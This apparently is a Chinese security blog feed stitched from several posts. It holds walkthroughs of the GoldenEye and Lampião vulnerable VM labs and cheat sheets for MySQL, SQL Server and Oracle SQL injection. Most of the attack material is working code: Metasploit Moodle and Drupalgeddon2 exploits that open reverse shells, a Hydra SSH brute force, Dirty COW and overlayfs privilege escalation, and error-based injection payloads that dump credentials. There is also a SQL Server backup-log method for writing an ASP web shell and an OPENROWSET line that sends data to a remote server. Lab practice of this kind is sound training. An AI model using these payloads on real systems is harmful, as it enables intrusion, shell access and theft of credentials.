O X O Xhttps://www.gravatar.com/avatar/a234dd02f8f13336cd11d1c8fb96c5232022-08-14T06:19:20.000Zhttps://www.dansemal.cn/Dansemaldansemalrayo@gmail.comHexo001-Goldeneyehttps://www.dansemal.cn/posts/243a10bf/2022-08-14T07:21:00.000Z2022-08-14T06:19:20.000Z项目Goldeneye
Name: GoldenEye: 1 Date release: 4 May 2018 Author: creosote Series: GoldenEye
1 2 3 4 5 6 7 8
Description
I recently got done creating an OSCP type vulnerable machine that's themed after the great James Bond film (and even better n64 game) GoldenEye. The goal is to get root and capture the secret GoldenEye codes - flag.txt.
I'd rate it as Intermediate, it has a good variety of techniques needed to get root - no exploit development/buffer overflows. After completing the OSCP I think this would be a great one to practice on, plus there's a hint of CTF flavor.
I've created and validated on VMware and VirtualBox. You won't need any extra tools other than what's on Kali by default. Will need to be setup as Host-Only, and on VMware you may need to click "retry" if prompted, upon initially starting it up because of formatting. ## Changelog Beta - 2018-05-02 v1 - 2018-05-04
信息搜集
获取项目地址
1
nmap -sP 10.0.0.0/24
返回
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
┌──(root㉿kali)-[~] └─# nmap -sP 10.0.0.0/24 Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-19 09:58 CST Nmap scan report for OpenWrt.lan (10.0.0.1) Host is up (0.00073s latency). MAC Address: 00:15:5D:64:C0:01 (Microsoft) Nmap scan report for PC-A.lan (10.0.0.2) Host is up (0.00045s latency). MAC Address: 00:15:5D:64:C0:00 (Microsoft) Nmap scan report for ubuntu.lan (10.0.0.101) Host is up (0.00044s latency). MAC Address: 00:0C:29:75:99:20 (VMware) Nmap scan report for kali.lan (10.0.0.3) Host is up. Nmap done: 256 IP addresses (4 hosts up) scanned in 2.07 seconds
确定项目ip为 10.0.0.101
扫描项目端口
1 2 3 4 5 6 7 8 9 10 11 12
┌──(root㉿kali)-[~] └─# nmap 10.0.0.101 Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-19 13:36 CST Nmap scan report for 01.lan (10.0.0.101) Host is up (0.00055s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE 25/tcp open smtp 80/tcp open http MAC Address: 00:0C:29:75:99:20 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.33 seconds
var data = [ { GoldenEyeText: "<span><br/>Severnaya Auxiliary Control Station<br/>****TOP SECRET ACCESS****<br/>Accessing Server Identity<br/>Server Name:....................<br/>GOLDENEYE<br/><br/>User: UNKNOWN<br/><span>Naviagate to /sev-home/ to login</span>" } ];
// //Boris, make sure you update your default password. //My sources say MI6 maybe planning to infiltrate. //Be on the lookout for any suspicious network traffic.... // //I encoded you p@ssword below... // //InvincibleHack3r // //BTW Natalya says she can break your codes //
var allElements = document.getElementsByClassName("typeing"); for (var j = 0; j < allElements.length; j++) { var currentElementId = allElements[j].id; var currentElementIdContent = data[0][currentElementId]; var element = document.getElementById(currentElementId); var devTypeText = currentElementIdContent;
var i = 0, isTag, text; (functiontype() { text = devTypeText.slice(0, ++i); if (text === devTypeText) return; element.innerHTML = text + `<span class='blinker'> </span>`; var char = text.slice(-1); if (char === "<") isTag = true; if (char === ">") isTag = false; if (isTag) returntype(); setTimeout(type, 60); })(); }
┌──(root㉿kali)-[~/100project/001] └─# nmap -p- 10.0.0.101 Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-19 15:37 CST Nmap scan report for 01.lan (10.0.0.101) Host is up (0.00089s latency). Not shown: 65531 closed tcp ports (reset) PORT STATE SERVICE 25/tcp open smtp 80/tcp open http 55006/tcp open unknown 55007/tcp open unknown MAC Address: 00:0C:29:75:99:20 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 6.15 seconds
┌──(root㉿kali)-[~/100project/001] └─# nmap -p55006,55007 10.0.0.101 -sS -sV -A -T5 Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-19 15:39 CST Nmap scan report for 01.lan (10.0.0.101) Host is up (0.0011s latency).
PORT STATE SERVICE VERSION 55006/tcp open ssl/pop3 Dovecot pop3d |_pop3-capabilities: AUTH-RESP-CODE PIPELINING UIDL USER SASL(PLAIN) CAPA RESP-CODES TOP |_ssl-date: TLS randomness does not represent time | ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server | Not valid before: 2018-04-24T03:23:52 |_Not valid after: 2028-04-23T03:23:52 55007/tcp open pop3 Dovecot pop3d |_pop3-capabilities: PIPELINING UIDL SASL(PLAIN) STLS RESP-CODES AUTH-RESP-CODE CAPA USER TOP | ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server | Not valid before: 2018-04-24T03:23:52 |_Not valid after: 2028-04-23T03:23:52 |_ssl-date: TLS randomness does not represent time MAC Address: 00:0C:29:75:99:20 (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop
TRACEROUTE HOP RTT ADDRESS 1 1.06 ms 01.lan (10.0.0.101)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 28.25 seconds
┌──(root㉿kali)-[~/100project/001] └─# nc 10.0.0.101 55007 +OK GoldenEye POP3 Electronic-Mail System user Boris # 输入账号 +OK pass secret1!# 输入密码 +OK Logged in. list +OK 3 messages: 1 544 2 373 3 921 . retr 1#读取邮件 +OK 544 octets Return-Path: <root@127.0.0.1.goldeneye> X-Original-To: boris Delivered-To: boris@ubuntu Received: from ok (localhost [127.0.0.1]) by ubuntu (Postfix) with SMTP id D9E47454B1 for <boris>; Tue, 2 Apr 1990 19:22:14 -0700 (PDT) Message-Id: <20180425022326.D9E47454B1@ubuntu> Date: Tue, 2 Apr 1990 19:22:14 -0700 (PDT) From: root@127.0.0.1.goldeneye
Boris, this is admin. You can electronically communicate to co-workers and students here. I'm not going to scan emails for security risks because I trust you and the other admins here. # 鲍里斯,这是管理员。您可以在此处与同事和学生进行电子交流。我不会扫描电子邮件是否存在安全风险,因为我相信你和这里的其他管理员 . retr 2 +OK 373 octets Return-Path: <natalya@ubuntu> X-Original-To: boris Delivered-To: boris@ubuntu Received: from ok (localhost [127.0.0.1]) by ubuntu (Postfix) with ESMTP id C3F2B454B1 for <boris>; Tue, 21 Apr 1995 19:42:35 -0700 (PDT) Message-Id: <20180425024249.C3F2B454B1@ubuntu> Date: Tue, 21 Apr 1995 19:42:35 -0700 (PDT) From: natalya@ubuntu Boris, I can break your codes! . retr 3 +OK 921 octets Return-Path: <alec@janus.boss> X-Original-To: boris Delivered-To: boris@ubuntu Received: from janus (localhost [127.0.0.1]) by ubuntu (Postfix) with ESMTP id 4B9F4454B1 for <boris>; Wed, 22 Apr 1995 19:51:48 -0700 (PDT) Message-Id: <20180425025235.4B9F4454B1@ubuntu> Date: Wed, 22 Apr 1995 19:51:48 -0700 (PDT) From: alec@janus.boss Boris, Your cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email. There can only be one set of these acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn! Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages.... PS - Keep security tight or we will be compromised. # 鲍里斯, # 您与我们辛迪加的合作将获得丰厚回报。附件是 GoldenEye 的最终访问代码。将它们放在此服务器根目录中的隐藏文件中,然后从该电子邮件中删除。这些访问代码只能有一组,我们需要保护它们以供最终执行。如果他们被找回并被俘虏,我们的计划将会崩溃和燃烧! # 一旦 Xenia 进入培训站点并熟悉 GoldenEye 终端代码,我们将进入最后阶段...... PS - 保持安全,否则我们将受到威胁
┌──(root㉿kali)-[~/100project/001] └─# nc 10.0.0.101 55007 +OK GoldenEye POP3 Electronic-Mail System user Natalya +OK pass bird +OK Logged in. list +OK 2 messages: 1 631 2 1048 . retr 1 +OK 631 octets Return-Path: <root@ubuntu> X-Original-To: natalya Delivered-To: natalya@ubuntu Received: from ok (localhost [127.0.0.1]) by ubuntu (Postfix) with ESMTP id D5EDA454B1 for <natalya>; Tue, 10 Apr 1995 19:45:33 -0700 (PDT) Message-Id: <20180425024542.D5EDA454B1@ubuntu> Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT) From: root@ubuntu
Natalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you. Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus. #娜塔莉亚,请你不要再破坏鲍里斯的密码了。此外,您是 GNO 培训主管。一旦学生被指定给您,我将通过电子邮件发送给您。 #此外,请注意可能的网络漏洞。我们获悉 GoldenEye 正受到一个名为 Janus 的犯罪集团的追捕 . retr 2 +OK 1048 octets Return-Path: <root@ubuntu> X-Original-To: natalya Delivered-To: natalya@ubuntu Received: from root (localhost [127.0.0.1]) by ubuntu (Postfix) with SMTP id 17C96454B1 for <natalya>; Tue, 29 Apr 1995 20:19:42 -0700 (PDT) Message-Id: <20180425031956.17C96454B1@ubuntu> Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT) From: root@ubuntu Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)
Ok, user creds are:
username: xenia password: RCP90rulez!
Boris verified her as a valid contractor so just create the account ok?
And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir **Make sure to edit your host file since you usually work remote off-network.... Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.
┌──(root㉿kali)-[~/100project/001] └─# nc 10.0.0.101 55007 +OK GoldenEye POP3 Electronic-Mail System user doak +OK pass goat +OK Logged in. list +OK 1 messages: 1 606 . retr 1 +OK 606 octets Return-Path: <doak@ubuntu> X-Original-To: doak Delivered-To: doak@ubuntu Received: from doak (localhost [127.0.0.1]) by ubuntu (Postfix) with SMTP id 97DC24549D for <doak>; Tue, 30 Apr 1995 20:47:24 -0700 (PDT) Message-Id: <20180425034731.97DC24549D@ubuntu> Date: Tue, 30 Apr 1995 20:47:24 -0700 (PDT) From: doak@ubuntu
James, If you're reading this, congrats you've gotten this far. You know how tradecraft works right?
Because I don't. Go to our training site and login to my account....dig until you can exfiltrate further information...... username: dr_doak password: 4England! .
Interact with a module by name or index. For example info 1, use 1 or use exploit/multi/http/moodle_spelling_path_rce
使用exp
1 2 3 4 5 6 7 8 9 10
msfconsole ---进入MSF框架攻击界面 search moodle ---查找 moodle类型 攻击的模块 use 0 ---调用0 exploit/multi/http/moodle_cmd_exec调用攻击脚本 set username admin ---设置用户名:admin set password xWinter1995x! ---设置密码:xWinter1995x! set rhost severnaya-station.com ---设置:rhosts severnaya-station.com set targeturi /gnocertdir ---设置目录: /gnocertdir set payload cmd/unix/reverse ---设置payload:cmd/unix/reverse set lhost 10.0.0.3 ---设置:lhost 10.0.0.3(需要本地IP) run ----执行命令
Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD yes Password to authenticate with Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using -Metasploit RPORT 80 yes The target port (TCP) SESSKEY no The session key of the user to impersonate SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI /moodle/ yes The URI of the Moodle installation USERNAME admin yes Username to authenticate with VHOST no HTTP server virtual host
Exploit target:
Id Name -- ---- 0 Automatic
msf6 exploit(multi/http/moodle_spelling_binary_rce) > set password xWinter1995x! password => xWinter1995x! msf6 exploit(multi/http/moodle_spelling_binary_rce) > set rhost severnaya-station.com rhost => severnaya-station.com msf6 exploit(multi/http/moodle_spelling_binary_rce) > set targeturi /gnocertdir targeturi => /gnocertdir msf6 exploit(multi/http/moodle_spelling_binary_rce) > set payload cmd/unix/reverse payload => cmd/unix/reverse msf6 exploit(multi/http/moodle_spelling_binary_rce) > set lhost 10.0.0.3 lhost => 10.0.0.3 msf6 exploit(multi/http/moodle_spelling_binary_rce) > run
[*] Started reverse TCP double handler on 10.0.0.3:4444 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. Exploitable Moodle version 2.2 detected [*] Authenticating as user: admin [*] Getting session key to update spellchecker if no session key was specified [*] Updating spellchecker to use the system aspell [*] Triggering payload [*] Exploit completed, but no session was created.
msf6 exploit(multi/http/moodle_spelling_binary_rce) > run
[*] Started reverse TCP double handler on 10.0.0.3:4444 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. Exploitable Moodle version 2.2 detected [*] Authenticating as user: admin [*] Getting session key to update spellchecker if no session key was specified [*] Updating spellchecker to use the system aspell [*] Triggering payload [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo 7YPpFMOnfF8gG8B3; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket A [*] A: "7YPpFMOnfF8gG8B3\r\n" [*] Matching... [*] B is input... whoami[*] Command shell session 2 opened (10.0.0.3:4444 -> 10.0.0.101:47575) at 2022-08-26 11:16:45 +0800
python -c "import pty;pty.spawn('/bin/bash')" <ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ cd /tmp cd /tmp www-data@01:/tmp$ uname -a uname -a Linux 01 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux www-data@01:/tmp$
www-data@01:/tmp$ cc 1.c -o exp cc 1.c -o exp 1.c:62:1: warning: control may reach end of non-void function [-Wreturn-type] } ^ 1.c:74:12: warning: implicit declaration of function'unshare' is invalid in C99 [-Wimplicit-function-declaration] if(unshare(CLONE_NEWUSER) != 0) ^ 1.c:79:17: warning: implicit declaration of function'clone' is invalid in C99 [-Wimplicit-function-declaration] clone(child_exec, child_stack + (1024*1024), clone_flags, NULL); ^ 1.c:85:13: warning: implicit declaration of function'waitpid' is invalid in C99 [-Wimplicit-function-declaration] waitpid(pid, &status, 0); ^ 1.c:95:5: warning: implicit declaration of function'wait' is invalid in C99 [-Wimplicit-function-declaration] wait(NULL); ^ 5 warnings generated. www-data@01:/tmp$ ./exp ./exp spawning threads mount #1 mount #2 child threads done /etc/ld.so.preload created creating shared library # id id uid=0(root) gid=0(root) groups=0(root),33(www-data) #
Description Would you like to keep hacking in your own lab?
Try this brand new vulnerable machine! "Lampião 1".
Get root!
Level: Easy
信息搜集
获取项目地址
1
nmap -sP 10.0.0.0/24
返回
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
┌──(root㉿kali)-[~/100project/002] └─# nmap -sP 10.0.0.0/24 Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-26 13:54 CST Nmap scan report for openwrt.lan (10.0.0.1) Host is up (0.00048s latency). MAC Address: 00:15:5D:80:01:00 (Microsoft) Nmap scan report for PC-A.lan (10.0.0.2) Host is up (0.00030s latency). MAC Address: 00:15:5D:64:C0:00 (Microsoft) Nmap scan report for 02.lan (10.0.0.102) Host is up (0.00063s latency). MAC Address: 00:0C:29:D0:3D:FF (VMware) Nmap scan report for kali.lan (10.0.0.3) Host is up. Nmap done: 256 IP addresses (4 hosts up) scanned in 2.03 seconds
确定项目ip为 10.0.0.102
扫描项目端口
namp -p- 10.0.0.102
1 2 3 4 5 6 7 8 9 10 11 12 13
┌──(root㉿kali)-[~/100project/002] └─# nmap -p- 10.0.0.102 Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-26 13:56 CST Nmap scan report for 02.lan (10.0.0.102) Host is up (0.0025s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 1898/tcp open cymtec-port MAC Address: 00:0C:29:D0:3D:FF (VMware)
Nmap done: 1 IP address (1 host up) scanned in 6.94 seconds
┌──(root㉿kali)-[~/100project/002] └─# hydra -l tiago -P passwd.txt -o success.txt 10.0.0.102 -s 22 ssh Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-02 15:11:42 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 844 login tries (l:1/p:844), ~53 tries per task [DATA] attacking ssh://10.0.0.102:22/ [22][ssh] host: 10.0.0.102 login: tiago password: Virgulino 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 2 final worker threads did not complete until end. [ERROR] 2 targets did not resolve or could not be connected [ERROR] 0 target did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-09-02 15:12:35
---- Entering directory: http://10.0.0.102:1898/includes/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w'if you want to scan it anyway)
---- Entering directory: http://10.0.0.102:1898/misc/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w'if you want to scan it anyway)
---- Entering directory: http://10.0.0.102:1898/modules/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w'if you want to scan it anyway)
---- Entering directory: http://10.0.0.102:1898/profiles/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w'if you want to scan it anyway)
---- Entering directory: http://10.0.0.102:1898/scripts/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w'if you want to scan it anyway)
---- Entering directory: http://10.0.0.102:1898/sites/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w'if you want to scan it anyway)
---- Entering directory: http://10.0.0.102:1898/themes/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w'if you want to scan it anyway)
Name Current Setting Required Description ---- --------------- -------- ----------- DUMP_OUTPUT false no Dump payload command output PHP_FUNC passthru yes PHP function to execute Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Usi ng-Metasploit RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes Path to Drupal install VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 10.0.0.3 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port
Exploit target:
Id Name -- ---- 0 Automatic (PHP In-Memory)
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts http://10.0.0.102:1898/ rhosts => http://10.0.0.102:1898/ msf6 exploit(unix/webapp/drupal_drupalgeddon2) > run
[*] Started reverse TCP handler on 10.0.0.3:4444 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target is vulnerable. [*] Sending stage (39927 bytes) to 10.0.0.102 [*] Meterpreter session 1 opened (10.0.0.3:4444 -> 10.0.0.102:52034) at 2022-09-03 15:24:06 +0800
meterpreter > shell Process 5701 created. Channel 0 created. python -c 'import pty; pty.spawn("/bin/bash")' www-data@lampiao:/var/www/html$ cd /tmp cd /tmp www-data@lampiao:/tmp$
www-data@lampiao:/tmp$ ls ls 40847.cpp dcow les.sh www-data@lampiao:/tmp$ ./dcow ./dcow Running ... Received su prompt (Password: ) Root password is: dirtyCowFun Enjoy! :-) www-data@lampiao:/tmp$ su root su root Password: dirtyCowFun
root@lampiao:/tmp# cd /root cd /root root@lampiao:~# ls ls flag.txt root@lampiao:~# cat f cat flag.txt 9740616875908d91ddcdaa8aea3af366 root@lampiao:~#
$result=mysql_query("select * from article where id=$id") ordie(mysql_error());
判断注入
and 1=1
1
http://sql.dansemal.cn/Less-5/?id=1' and 1=1 -- qwe
and 1=2
1
http://sql.dansemal.cn/Less-5/?id=1' and 1=2 -- qwe
报错语句
通过 floor 报错
/数据库版本/
1
and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
1 2 3
http://sql.dansemal.cn/Less-5/?id=1' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- qwe
/连接用户/
1
and(select 1 from(select count(*),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
1 2 3
http://sql.dansemal.cn/Less-5/?id=1' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- qwe
/连接数据库/
1
and(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
1 2 3
http://sql.dansemal.cn/Less-5/?id=1' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- qwe
/暴库/
1 2 3
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
1 2 3
http://sql.dansemal.cn/Less-5/?id=1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- qwe
/暴表/
1
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
1 2 3 4
http://sql.dansemal.cn/Less-5/?id=1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- qwe
limit 3,1
/暴字段/
1
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x7573657273 LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
1 2 3 4
http://sql.dansemal.cn/Less-5/?id=1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x7573657273 LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- qwe
limit 1,1
limit 2,1
/暴内容/
1 2 3 4
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,id,0x23,username,0x3a,password,0x23) FROM users limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables` `group by x)a)
1 2 3 4
http://sql.dansemal.cn/Less-5/?id=1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,id,0x23,username,0x3a,password,0x23) FROM users limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- qwe
ExtractValue(有长度限制,最长 32 位)
1
and extractvalue(1, concat(0x7e, (select @@version),0x7e))
1
http://sql.dansemal.cn/Less-5/?id=1' and extractvalue(1, concat(0x7e, (select @@version),0x7e))-- qwe
1
and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x23,id,0x23,username,0x3a,password,0x23) FROM users limit 0,1)))
1
http://sql.dansemal.cn/Less-5/?id=1' and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x23,id,0x23,username,0x3a,password,0x23) FROM users limit 0,1)))-- qwe
UpdateXml(有长度限制,最长 32 位)
1
and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)
1
http://sql.dansemal.cn/Less-5/?id=1' and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)-- qwe
1
and updatexml(1,concat(0x7e,(SELECT distinct concat(0x23,id,0x23,username,0x3a,password,0x23) FROM users limit 0,1),0x7e),1)
1
http://sql.dansemal.cn/Less-5/?id=1' and updatexml(1,concat(0x7e,(SELECT distinct concat(0x23,id,0x23,username,0x3a,password,0x23) FROM users limit 0,1),0x7e),1)-- qwe
1
and updatexml(1,concat(0x7e,(SELECT distinct LENGTH(concat(0x23,username,0x3a,password,0x23)) FROM users limit 0,1),0x7e),1)
1 2
http://sql.dansemal.cn/Less-5/?id=1' and updatexml(1,concat(0x7e,(SELECT distinct LENGTH(concat(0x23,username,0x3a,password,0x23)) FROM users limit 0,1),0x7e),1)-- qwe
查询长度为11
SUBSTRING()字符串截取函数
1 2 3
http://sql.dansemal.cn/Less-5/?id=1' and updatexml(1,concat(0x7e,(SELECT distinct SUBSTRING(concat(0x23,username,0x3a,password,0x23),1,11) FROM users limit 0,1),0x7e),1)-- qwe
sqlserver 经常与 asp 或者 aspx 一起使用,操作系统多数是 win2012 win2018
数据库版本 sql2008 sql2012
1
http://59.63.200.79:8015/?id=1
注释
–空格 单行注释
/* */ 多行注释
判断是否注入
’ 单引号是否报错
and 1=2
and 1=1 页面是否相同
判断列数
order by
order by 3 正常
联合查询
联合查询 需要每个列的类型要一直 或者可以使用 null 直到页面出错
1
http://59.63.200.79:8015/?id=1' union select 1,'2','3' --qwe
第一个 2 ,3 为字符串 1为整型
查询系统信息
db_name() 数据库名
@@version 版本信息
User_Name() 当前用户
host_name() 计算机名称
1
http://59.63.200.79:8015/?id=1' union select 1,db_name(),@@version --qwe
SQLserver 报错注入
内容
命令
显示系统信息
and @@version>0
爆出数据库
and db_name()>0
当前用户
and User_Name()>0
爆出其他数据库
sqland (SELECT top 1 Name FROM Master..SysDatabases)>0 and (SELECT top 1 Name FROM Master..SysDatabases where name not in ('master'))>0 and (SELECT top 1 Name FROM Master..SysDatabases where name not in ('master','iNethinkCMS','model','msdb'))>0
爆表
and (select top 1 name from [mydb].sys.all_objects where type=‘U’ AND is_ms_shipped=0)>0 and (select top 1 name from mydb.sys.all_objects where type=‘U’ AND is_ms_shipped=0 and name not in (‘admin’))>0
爆列
and (select top 1 COLUMN_NAME from mydb.information_schema.columns where TABLE_NAME=‘admin’ and COLUMN_NAME not in(‘ID’))>0 and (select top 1 COLUMN_NAME from mydb.information_schema.columns where TABLE_NAME=‘admin’ and COLUMN_NAME not in(‘ID’,‘username’))>0
爆数据
and (select top 1 password from admin)>0 and (select top 1 username from admin)>0
;backup log mydb to disk ='C:/phpStudy/MSSQL/WWW/123.asp'
;droptable test_tmp
select*from art where id=1;IF EXISTS(select table_name from information_schema.tables where table_name='test_tmp')droptable test_tmp;create table test_tmp (a image);backup log mydb to disk ='C:/inetpub/wwwroot/www.demo1.com/asp.bak'with init;insertinto test_tmp (a) values (0x3C25657865637574652872657175657374282261222929253EDA);backup log mydb to disk ='C:/inetpub/wwwroot/www.demo1.com/123.asp'
http://www.demo1.com/index.aspx?id=1;insert into OPENROWSET(‘SQLOLEDB’, ‘server=192.168.0.122;uid=sa;pwd=123456’, ‘select * from %23%23nonamed’ ) select * from %23%23nonamed
在远程 sqlserver 执行这个命令 就可以获取 数据 select * from %23%23nonamed
select SYS_CONTEXT (‘USERENV’, ‘CURRENT_USER’) from dual
当前用户
SELECT user FROM dual
查询库名
select owner from all_tables where rownum=1 select owner from all_tables where rownum=1 and owner <>‘SYS’
查询表(表名大写)
select table_name from user_tables where rownum=1 select table_name from user_tables where rownum=1 and table_name<>‘ADMIN’
查询列
select column_name from user_tab_columns where table_name=‘ADMIN’ and rownum=1 select column_name from user_tab_columns where table_name=‘ADMIN’ and column_name<>‘ID’ and rownum=1 select column_name from user_tab_columns where table_name=‘ADMIN’ and column_name<>‘ID’ and column_name<>‘USERNAME’ and rownum=1
查询数据
SELECT CONCAT(USERNAME,PASSWORD) FROM ADMIN
当前用户
SELECT user FROM dual
列出所有用户
SELECT username FROM all_users ORDER BY username
列出数据库
SELECT DISTINCT owner FROM all_tables
列出表名
SELECT table_name FROM all_tables SELECT owner, table_name FROM all_tables
查询表所有列
SELECT column_name FROM all_tab_columns WHERE TABLE_NAME=‘ADMIN’
Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all usersin the current database to the list PASSWORD no A specific password to authenticate with PASS_FILE no File containing passwords, one per line RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'f ile:<path>' RPORT 22 yes The target port STOP_ON_SUCCESS falseyes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads (max one per host) USERNAME no A specific username to authenticate as USERPASS_FILE no File containing users and passwords separated by space, one pair per li ne USER_AS_PASS false no Try the username as the password for all users USER_FILE no File containing usernames, one per line VERBOSE falseyes Whether to print output for all attempts
Description: This module will test ssh logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.
